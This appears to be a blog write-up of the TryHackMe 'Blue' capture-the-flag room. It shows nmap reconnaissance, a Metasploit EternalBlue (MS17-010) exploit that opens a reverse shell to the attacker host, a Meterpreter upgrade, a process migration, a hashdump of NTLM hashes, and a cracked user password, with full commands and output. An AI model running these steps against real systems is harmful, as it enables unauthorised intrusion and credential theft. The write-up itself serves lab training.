THM - Blue

Blue

Skibum 5/2/2020


IP address 10.10.124.30

Recon

kali@kali:~/Documents/THM/blue$ sudo nmap -sC -sV 10.10.124.3

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 20:44 EDT
    Nmap scan report for 10.10.124.30
    Host is up (0.14s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE        VERSION
    135/tcp   open  msrpc          Microsoft Windows RPC
    139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ms-wbt-server?
    |_ssl-date: 2020-05-03T00:45:47+00:00; -1s from scanner time.
    49152/tcp open  msrpc          Microsoft Windows RPC
    49153/tcp open  msrpc          Microsoft Windows RPC
    49154/tcp open  msrpc          Microsoft Windows RPC
    49158/tcp open  msrpc          Microsoft Windows RPC
    49160/tcp open  msrpc          Microsoft Windows RPC
    Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 1h14m58s, deviation: 2h30m00s, median: -1s
    |_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:a7:6a:15:93:60 (unknown)
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: Jon-PC
    |   NetBIOS computer name: JON-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2020-05-02T19:45:41-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-03T00:45:41
    |_  start_date: 2020-05-03T00:37:19

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 157.74 seconds

kali@kali:~/Documents/THM/blue$ nmap --script=smb-vuln-ms* 10.10.124.30

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:08 EDT
    Nmap scan report for 10.10.124.30
    Host is up (0.14s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    3389/tcp  open  ms-wbt-server
    49152/tcp open  unknown
    49153/tcp open  unknown
    49154/tcp open  unknown
    49158/tcp open  unknown
    49160/tcp open  unknown

    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
    | smb-vuln-ms17-010: 
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |           
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

    Nmap done: 1 IP address (1 host up) scanned in 14.75 seconds

Metasploit

metasploit search

    msf5>search ms17

    Matching Modules
    ================

       #   Name                                                   Disclosure Date  Rank     Check  Description
       -   ----                                                   ---------------  ----     -----  -----------                                    
       0   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration                                                                                                                          
       1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration                                                                                                                     
       2   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration                                                                                                                                      
       3   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS       
       4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS  
       5   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution                                                                                                  
       6   auxiliary/scanner/smb/smb_ms17_010                                      normal   No     MS17-010 SMB RCE Detection                     
       7   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882                
       8   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption                                                                                                                               
       9   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+                                                                                                                     
       10  exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution                                                                                                     
       11  exploit/windows/smb/smb_doublepulsar_rce               2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution   

Run Scanner

msf5 auxiliary(scanner/smb/smbms17010) > show options

    Module options (auxiliary/scanner/smb/smb_ms17_010):

       Name         Current Setting                                                 Required  Description
       ----         ---------------                                                 --------  -----------
       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS       10.10.124.30                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        445                                                             yes       The SMB service port (TCP)
       SMBDomain    .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                      no        The password for the specified username
       SMBUser                                                                      no        The username to authenticate as
       THREADS      1                                                               yes       The number of concurrent threads (max one per host)

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    [+] 10.10.124.30:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activemodel-4.2.11.1/lib/active_model/validations/numericality.rb:68: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead

    [*] 10.10.124.30:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Run Exploit

msf5 exploit(windows/smb/ms17010eternalblue) > set RHOSTS 10.10.124.30

    RHOSTS => 10.10.124.30
    msf5 exploit(windows/smb/ms17_010_eternalblue) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444 
    [*] 10.10.124.30:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 10.10.124.30:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] 10.10.124.30:445      - Scanned 1 of 1 hosts (100% complete)
    [*] 10.10.124.30:445 - Connecting to target for exploitation.
    [+] 10.10.124.30:445 - Connection established for exploitation.
    [+] 10.10.124.30:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 10.10.124.30:445 - CORE raw buffer dump (42 bytes)
    [*] 10.10.124.30:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] 10.10.124.30:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] 10.10.124.30:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
    [+] 10.10.124.30:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 10.10.124.30:445 - Trying exploit with 12 Groom Allocations.
    [*] 10.10.124.30:445 - Sending all but last fragment of exploit packet
    [*] 10.10.124.30:445 - Starting non-paged pool grooming
    [+] 10.10.124.30:445 - Sending SMBv2 buffers
    [+] 10.10.124.30:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 10.10.124.30:445 - Sending final SMBv2 buffers.
    [*] 10.10.124.30:445 - Sending last fragment of exploit packet!
    [*] 10.10.124.30:445 - Receiving response from exploit packet
    [+] 10.10.124.30:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 10.10.124.30:445 - Sending egg to corrupted connection.
    [*] 10.10.124.30:445 - Triggering free of corrupted buffer.
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Command shell session 1 opened (10.9.9.59:4444 -> 10.10.124.30:49219) at 2020-05-02 21:18:53 -0400
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Granted Access

C:\Windows\system32>

Upgrade Session

msf5 post(multi/manage/shelltometerpreter) > sessions -u 1

    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

    [*] Upgrading session ID: 1
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on 10.9.9.59:4433 
    msf5 post(multi/manage/shell_to_meterpreter) > 
    [*] Sending stage (180291 bytes) to 10.10.124.30
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Meterpreter session 2 opened (10.9.9.59:4433 -> 10.10.124.30:49233) at 2020-05-02 21:30:13 -0400
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Stopping exploit/multi/handler

msf5 post(multi/manage/shelltometerpreter) > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information                                                                       Connection
      --  ----  ----                     -----------                                                                       ----------
      1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.9.9.59:4444 -> 10.10.124.30:49231 (10.10.124.30)
      2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      10.9.9.59:4433 -> 10.10.124.30:49233 (10.10.124.30)

msf5 post(multi/manage/shelltometerpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > ps

      Process List
      ============

       PID   PPID  Name                  Arch  Session  User                          Path
       ---   ----  ----                  ----  -------  ----                          ----
       0     0     [System Process]                                                   
       4     0     System                x64   0                                      
       100   668   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
       356   716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
       460   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       568   560   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
       616   560   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
       628   608   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
       668   608   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
       716   616   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
       724   616   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
       732   616   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
       788   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       840   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       908   716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       932   1372  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
       956   716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1116  716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1228  716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       1356  716   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
       1372  2020  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       1392  716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1452  716   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
       1528  716   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
       1600  932   cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
       1676  716   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
       1952  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
       1996  716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       2080  840   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
       2208  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       2236  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
       2340  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       2520  716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       2584  716   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
       2624  716   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
       2752  716   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
       2944  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       3024  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       3068  716   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe

Cracking Passwords

meterpreter > migrate

       Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]

       Migrates the server instance to another process.
       NOTE: Any open channels or other dynamic state will be lost.

meterpreter > migrate -N winlogon.exe

       [*] Migrating from 932 to 668...
       [*] Migration completed successfully.

meterpreter > hashdump

       Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Jons Passwoprd Cracks to

Hash Type Result
ffb43f0de35be4d9917ac0cc8ad57f8d NTLM alqfna22

All Flags Found !!!!


You'll only receive email when they publish something new.

More from sk18um
All posts